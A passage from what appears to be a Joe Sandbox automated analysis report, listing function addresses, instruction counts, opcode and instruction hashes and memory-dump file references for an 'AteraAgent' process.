                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 984d5782ea4abb2fc50dea3898da612beccb4d73925977f7d1e715ae012c6083
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1151aac2ad56fc14de03e2ecfcc65b2a3572ef4e2ba8688ba70bb8cad43ccbd
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90E02B35B053895BCB586B99B4215EEBB60DB81321B1000FBC29DCB446CE2024568B61
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62A0A8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0f2c4b5d9fa8ed0700df44b352d89ae032e0f14dd2756aec51891b3807fc6755
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 97c987075a9ae8924be3caf00285969aa22657b51adcb5d0a244303e092d2308
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f2c4b5d9fa8ed0700df44b352d89ae032e0f14dd2756aec51891b3807fc6755
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4E06831B092894BDB0CABA4B4216FDBB60DF01320F1000FBC1ADCB087CF2028664F51
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B628075 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d661ade1b60183de61ba23e9f6106ca9e13aca0c65101fe00bef2cc3a85197c8
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c5ed0fa9a202d5fd9c531974d280048d306673d147ff3201f14d283cb7cd5c27
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d661ade1b60183de61ba23e9f6106ca9e13aca0c65101fe00bef2cc3a85197c8
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E0E531E0451C8EDBA4EF68E851BECF7B1FF44205F4000BAE01DE3286CA3569858B00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B634190 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a8803bc164aed6dadba097b96f70b0f6d1ef05c3e08f66b284984a90bc373b31
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 273f72f649857eaa407d26ca82eac1ae6410a42d27a49cb6acf1a57a9ffb7f60
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8803bc164aed6dadba097b96f70b0f6d1ef05c3e08f66b284984a90bc373b31
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CE09A71E1591E4EEB68DAA898557ADA3B1FF64341F10057ED01DD3292CE3469428B40
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6408C6 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: de956c72301a99ddf4b7c9cd888aa170bbadf8d60baea79ff58d6c88b0d821ed
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5eaf1a2b6bb53d19d9f305bce81b315c6651ca9b396222b03cce61be4738d97d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de956c72301a99ddf4b7c9cd888aa170bbadf8d60baea79ff58d6c88b0d821ed
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBD05E32309C0E4FEA94E24CB4652B4B3D1EB9823171601A6D018C7261DD26EC828784
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B632993 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 25004aa1c09edd23209cd2010b013e2cb334e0be0605624a0089bd75b8ca393e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 35cc7913d8ded6d10f726f22ce837fe7a11733317c63a6d5609022cae64b73d8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25004aa1c09edd23209cd2010b013e2cb334e0be0605624a0089bd75b8ca393e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70D05E316092404FCB59AE28A080C80B790EF1221835509E8E0144B2EBD62ADC82CB45
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62AA80 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 226b74e69f30b509f1d476fe860c5f53566b51eb71a46007daf5d590cb2547c4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: eaa08b7876e76e87079fc31b097ef8d12ea6eff3ba02d74524467b7b19e49aa8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 226b74e69f30b509f1d476fe860c5f53566b51eb71a46007daf5d590cb2547c4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04C08C2092590D4ED728B72944510147290FF08200FC402E4E00CC2284D6ACA1504705
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B641B4D Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a347d32a3fe0ed1507e6714dafa9922d67806753764a2b73482c7680e88129db
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 52ffd5c946e3f3d6edb5762428a716e0dd20c9eb55e804cd7900f2dcd67be164
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a347d32a3fe0ed1507e6714dafa9922d67806753764a2b73482c7680e88129db
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84B09B62F0AF4D1BDBA0864C545435157D3D7E8651B0506169499C2555FD5154434601